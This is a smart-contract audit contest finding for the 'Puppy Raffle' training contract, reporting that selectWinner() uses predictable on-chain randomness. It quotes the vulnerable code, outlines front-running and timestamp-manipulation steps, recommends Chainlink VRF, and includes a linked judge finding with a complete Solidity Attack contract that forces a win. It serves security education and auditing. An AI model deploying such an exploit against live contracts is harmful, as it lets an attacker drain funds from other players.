Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Weak On-Chain Randomness Allows Winner Manipulation

paktiko

Root + Impact

Description

The selectWinner() function uses predictable on-chain data (msg.sender, block.timestamp, block.difficulty) for randomness. Block.difficulty is deprecated and replaced with prevrandao in newer versions. An attacker can:

  1. Calculate the winning index before calling selectWinner() by simulating the hash calculation,

  2. Enter the raffle at the exact position to win,

  3. Front-run legitimate selectWinner() calls,

  4. If they are a validator/miner, manipulate block.timestamp within allowed bounds.

  5. The same weak randomness affects NFT rarity determination.

function selectWinner() external {
require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
address winner = players[winnerIndex];
// ...
uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Risk

Impact:
Attackers can guarantee winning the raffle and obtaining rare NFTs by predicting or manipulating the randomness. This completely undermines the fairness of the raffle system and could result in consistent exploitation by sophisticated actors.

Proof of Concept

Monitor the mempool for selectWinner() transactions
Calculate winnerIndex using current block data: `uint256(keccak256(abi.encodePacked(attackerAddress, block.timestamp, block.difficulty))) % players.length`
If not winning, front-run with refund() calls to adjust player array
Or enter at calculated positions to guarantee win
Call selectWinner() when guaranteed to win
For validators: slightly adjust block.timestamp to favor specific outcomes

Recommended Mitigation

import "@chainlink/contracts/src/v0.8/VRFConsumerBase.sol";
contract PuppyRaffle is ERC721, Ownable, VRFConsumerBase {
bytes32 internal keyHash;
uint256 internal fee;
uint256 public randomResult;
function selectWinner() external {
require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
requestRandomness(keyHash, fee);
}
function fulfillRandomness(bytes32 requestId, uint256 randomness) internal override {
uint256 winnerIndex = randomness % players.length;
// Process winner with truly random number
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 month ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!